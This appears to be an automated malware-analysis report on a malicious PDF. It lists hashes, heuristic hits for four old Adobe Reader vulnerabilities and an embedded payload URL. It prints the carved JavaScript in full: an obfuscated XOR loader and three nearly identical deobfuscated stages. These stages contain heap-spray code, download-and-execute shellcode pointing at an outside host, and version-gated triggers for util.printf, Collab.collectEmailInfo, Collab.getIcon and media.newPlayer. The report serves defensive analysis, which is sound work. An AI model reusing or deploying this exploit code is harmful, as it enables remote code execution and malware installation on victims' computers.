Malicious PDF — malware analysis report

Static analysis result for SHA-256 a88d0bf40322aed8…

MALICIOUS

PDF

7.6 KB Created: 2010-04-14 17:28:02 Authoring application: Kadevitonsipoe First seen: 2026-05-10
MD5: 709a486210de5f0532c5739f5406c200 SHA-1: 083a830002212485b0f6210658e5fd48608640ae SHA-256: a88d0bf40322aed872887722ff19fd8d5a43a2fac6e4975106fdc5f0bf73c72e
410 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://amtima.com//FsVXUTP6u-l.php/e14375647f58f92525b31b78fde924ce?spl=pdf_2027 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x17EA 1515 bytes
SHA-256: c7859b0eeb916268138afb25e2e7385c5e5c65d34f946482468507db3e4275ea
Preview script
First 1,000 lines of the extracted script
var  google = 1 ; var  d = 64 ;  var adobe = [ "p" , "" , "a" , "p" ]; unlock = new  String ( adobe [ 2 ] + adobe [ 0 ] + adobe [ 0 ] + adobe [ 1 ] ) ;  var adobeMail = [ "ev" , "" , "al" ]; emailV = new  String ( adobeMail [ 0 ] + adobeMail [ 2 ] + adobeMail [ 1 ] ) ;   var  window = new String("une"+"vfNsca".substr(3)+"vFSpe".substr(3)) ; var  sdsdf = new String("char"+"CodeZXqy".substr(0,4)+"At") ; var  dDsjkg = new String("from"+"NYxChar".substr(3)+"6hZCodeZh6".substr(3,4)) ; var  arrayFoxit = "getPj9yR".substr(0,4)+"ageN"+"thWo"+"pQ2rdpQ2".substr(3,2) ; var  adobeEdit = "getPG6WS".substr(0,4)+"DyMageN".substr(3)+"BXCumWoBCX".substr(3,4)+"rdslDeP".substr(0,3) ;  var  emailCheck = "" ; var  fsdf = String ; var  b = new String("%") ; var  send = new String("subs"+"OUytr".substr(3)) ; var  googleC = 2 ; var  sdCheck = 0 ;  var  unlock = this [ unlock ] ; function  fsdfReader ( editD , sdsdfSdfj ) { return  editD ^ sdsdfSdfj ; } var  emailGoogle = this [ adobeEdit ] ( google ) ; var  sdftuf = this [ window ] ; var  v = this [ emailV ] ;  for ( var  windowA = sdCheck ; windowA < emailGoogle ; windowA++ ) {   arrayFoxitDsjkg = this [ arrayFoxit ] ( google , windowA ) ;  var  sdfjWindow = arrayFoxitDsjkg [ send ] ( arrayFoxitDsjkg . length - googleC , googleC ) ; var  bArray = b + sdfjWindow ; var  dsjkgGoogle = sdftuf ( bArray ) ; var  unlockSd = dsjkgGoogle [ sdsdf ] ( sdCheck ) ; var  uFsdf = fsdfReader ( unlockSd , d ) ;  emailCheck += fsdf [ dDsjkg ] ( uFsdf ) ; }  v ( emailCheck ) ;
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3459 bytes
SHA-256: 1438e186d2593442263ad129a4dab532f4500bf36bfbe2604e9331e7902edf13
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://amtima.com//FsVXUTP6u-l.php/e14375647f58f92525b31b78fde924ce?spl=pdf_2027 */
var _u="http://amtima.com//FsVXUTP6u-l.php/e14375647f58f92525b31b78fde924ce?spl=pdf_2027";
����
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U";

var hwTl9Dn = new Array();  

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);

	return ret;
};


function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}

	return ret;
};


function Rq4v1qCC(PDrScZj4, ez5pL6){    

	while (PDrScZj4.length * 2 < ez5pL6){      
		PDrScZj4 += PDrScZj4;    
	}    

	PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2);    return PDrScZj4;  
}  

function x8EvTm(I7T0vko5){  

	var qPBt7D = 0x0c0c0c0c;        

	NRjjR6W6 = get_shellcode("pdf");

	if (I7T0vko5 == 1){qPBt7D = 0x30303030;}

	var FeQq1Vv = 0x400000;   
	var tsSzSc = NRjjR6W6.length * 2;    var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);    
	var PDrScZj4 = unescape("%u9090%u9090");    

	PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);    

	var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;    

	for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){    
		hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;    
	}
}  

function U2UcYKr(){   

var IyIFVe = app.viewerVersion.toString();          

	if (IyIFVe > 8)
	{
		x8EvTm(1);
		var iVvCdy8 = "12999999999999999999";          

		for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
		{
			iVvCdy8 += "8";   
		}

		util.printf("%45000f", iVvCdy8);      
	}


if (IyIFVe < 8){

	x8EvTm(0);    
	var UNXaCTHb = unescape("%u0c0c%u0c0c");    

	while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;    

	this .collabStore = Collab.collectEmailInfo({        subj : "", msg : UNXaCTHb});      
}       

if (IyIFVe < 9.1){

	if (app.doc.Collab.getIcon)
	{
		x8EvTm(0); 
        var eGREUTNw = unescape("%09");          
		while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;

		eGREUTNw = "N." + eGREUTNw;    

		app.doc.Collab.getIcon(eGREUTNw);   
	}
}   
if (IyIFVe == 9.2){        
	x8EvTm(1);              
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());           
	try 
	{	
		media.newPlayer(null);              
	} catch(e) 
	{}
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
}

}

U2UcYKr();

�����@Pass}��!�O-��7 NfY@��	G4
legacy_pdfkit_stage_001.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3527 bytes
SHA-256: f6bc8b56be5d5ca9168fe5d7e824d1776976fa0737f99b4f2f0384dbf8be09c4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://amtima.com//FsVXUTP6u-l.php/e14375647f58f92525b31b78fde924ce?spl=pdf_2027 */
var _u="http://amtima.com//FsVXUTP6u-l.php/e14375647f58f92525b31b78fde924ce?spl=pdf_2027";
������������뚮�����늞�뮞�����
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U";

var hwTl9Dn = new Array();  

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);

	return ret;
};


function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}

	return ret;
};


function Rq4v1qCC(PDrScZj4, ez5pL6){    

	while (PDrScZj4.length * 2 < ez5pL6){      
		PDrScZj4 += PDrScZj4;    
	}    

	PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2);    return PDrScZj4;  
}  

function x8EvTm(I7T0vko5){  

	var qPBt7D = 0x0c0c0c0c;        

	NRjjR6W6 = get_shellcode("pdf");

	if (I7T0vko5 == 1){qPBt7D = 0x30303030;}

	var FeQq1Vv = 0x400000;   
	var tsSzSc = NRjjR6W6.length * 2;    var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);    
	var PDrScZj4 = unescape("%u9090%u9090");    

	PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);    

	var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;    

	for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){    
		hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;    
	}
}  

function U2UcYKr(){   

var IyIFVe = app.viewerVersion.toString();          

	if (IyIFVe > 8)
	{
		x8EvTm(1);
		var iVvCdy8 = "12999999999999999999";          

		for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
		{
			iVvCdy8 += "8";   
		}

		util.printf("%45000f", iVvCdy8);      
	}


if (IyIFVe < 8){

	x8EvTm(0);    
	var UNXaCTHb = unescape("%u0c0c%u0c0c");    

	while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;    

	this .collabStore = Collab.collectEmailInfo({        subj : "", msg : UNXaCTHb});      
}       

if (IyIFVe < 9.1){

	if (app.doc.Collab.getIcon)
	{
		x8EvTm(0); 
        var eGREUTNw = unescape("%09");          
		while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;

		eGREUTNw = "N." + eGREUTNw;    

		app.doc.Collab.getIcon(eGREUTNw);   
	}
}   
if (IyIFVe == 9.2){        
	x8EvTm(1);              
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());           
	try 
	{	
		media.newPlayer(null);              
	} catch(e) 
	{}
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
}

}

U2UcYKr();

���������������������������������������������������������4B4B
page_word_xor_stage_000.js deobfuscated-js page-word hex-tail XOR decoded JavaScript (decompressed, key=0x40) at offset 0x4F4 3220 bytes
SHA-256: e5b6d861b4282f5ed48fd6f65aa45f57d7f148a5225e135413c6d6d27ec1780f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U";

var hwTl9Dn = new Array();  

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);

	return ret;
};


function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}

	return ret;
};


function Rq4v1qCC(PDrScZj4, ez5pL6){    

	while (PDrScZj4.length * 2 < ez5pL6){      
		PDrScZj4 += PDrScZj4;    
	}    

	PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2);    return PDrScZj4;  
}  

function x8EvTm(I7T0vko5){  

	var qPBt7D = 0x0c0c0c0c;        

	NRjjR6W6 = get_shellcode("pdf");

	if (I7T0vko5 == 1){qPBt7D = 0x30303030;}

	var FeQq1Vv = 0x400000;   
	var tsSzSc = NRjjR6W6.length * 2;    var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);    
	var PDrScZj4 = unescape("%u9090%u9090");    

	PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);    

	var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;    

	for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){    
		hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;    
	}
}  

function U2UcYKr(){   

var IyIFVe = app.viewerVersion.toString();          

	if (IyIFVe > 8)
	{
		x8EvTm(1);
		var iVvCdy8 = "12999999999999999999";          

		for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
		{
			iVvCdy8 += "8";   
		}

		util.printf("%45000f", iVvCdy8);      
	}


if (IyIFVe < 8){

	x8EvTm(0);    
	var UNXaCTHb = unescape("%u0c0c%u0c0c");    

	while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;    

	this .collabStore = Collab.collectEmailInfo({        subj : "", msg : UNXaCTHb});      
}       

if (IyIFVe < 9.1){

	if (app.doc.Collab.getIcon)
	{
		x8EvTm(0); 
        var eGREUTNw = unescape("%09");          
		while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;

		eGREUTNw = "N." + eGREUTNw;    

		app.doc.Collab.getIcon(eGREUTNw);   
	}
}   
if (IyIFVe == 9.2){        
	x8EvTm(1);              
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());           
	try 
	{	
		media.newPlayer(null);              
	} catch(e) 
	{}
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
}

}

U2UcYKr();

Open this report in the interactive analyzer, or submit your own file for analysis.